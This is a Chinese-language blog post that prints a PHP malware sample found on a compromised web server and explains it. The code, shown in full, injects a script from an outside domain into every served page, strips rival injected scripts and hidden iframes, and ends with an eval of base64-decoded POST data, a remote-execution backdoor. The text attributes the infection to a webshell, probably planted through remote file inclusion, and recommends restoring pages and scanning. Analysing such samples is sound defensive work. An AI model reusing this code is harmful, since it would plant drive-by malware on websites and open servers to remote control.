if(!isset($ev8l1)){function ev8l($s){if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v)if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s)}if(preg_match_all('#<iframe ([^>]*?)src=[\'"]?(http:)?//([^>]*?)>#is',$s,$a))foreach($a[0] as $v)if(preg_match('# width\s*=\s*[\'"]?0*[01][\'">]|display\s*:\s*none#i',$v)&&!strstr($v,'?'.'>'))$s=preg_replace('#'.preg_quote($v,'#').'.*?</iframe>#is','',$s)$s=str_replace($a='<script src=http://griffintoilethire.co.uk/images/s7cg/gifimg.php ></script>','',$s)if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',$a.'\1',$s)elseif(strpos($s,',a'))$s.=$areturn $s}function ev8l2($a,$b,$c,$d){global $ev8l1$s=array()if(function_exists($ev8l1))call_user_func($ev8l1,$a,$b,$c,$d)foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='ev8l')returnelseif($a=='ob_gzhandler')breakelse $s[]=array($a=='default output handler'?false:$a)for($i=count($s)-1$i>=0$i--){$s[$i][1]=ob_get_contents()ob_end_clean()}ob_start('ev8l')for($i=0$i<count($s)$i++){ob_start($s[$i][0])echo $s[$i][1]}}}$ev8ll=(($a=@set_error_handler('ev8l2'))!='ev8l2')?$a:0eval(base64_decode($_POST['e']))
意思是将参数中的<script>...</script>部分替换为<script src=http://griffintoilethire.co.uk/images/s7cg/gifimg.php ></script>,这样你的网页就被挂上了马。这段代码应该是通过webshell上传到你机器上的一段挂马程序,至于webshell 的打开有很多原因,即然是php代码那么你的机器上很可能存在php远程文件包含漏洞,也就是如果你的机器上存在Wordtrans、WordPress、rgboard、phpcms等php程序,那么很可能就有这个的漏洞。
推荐解决方法:
1.恢复已被篡改的网页
2.找一个RFI扫描器对本机进行扫描,将找到的漏洞进行修补(相应的程序网上都有对应的修补方法)
微信扫一扫
支付宝扫一扫
评论列表(0条)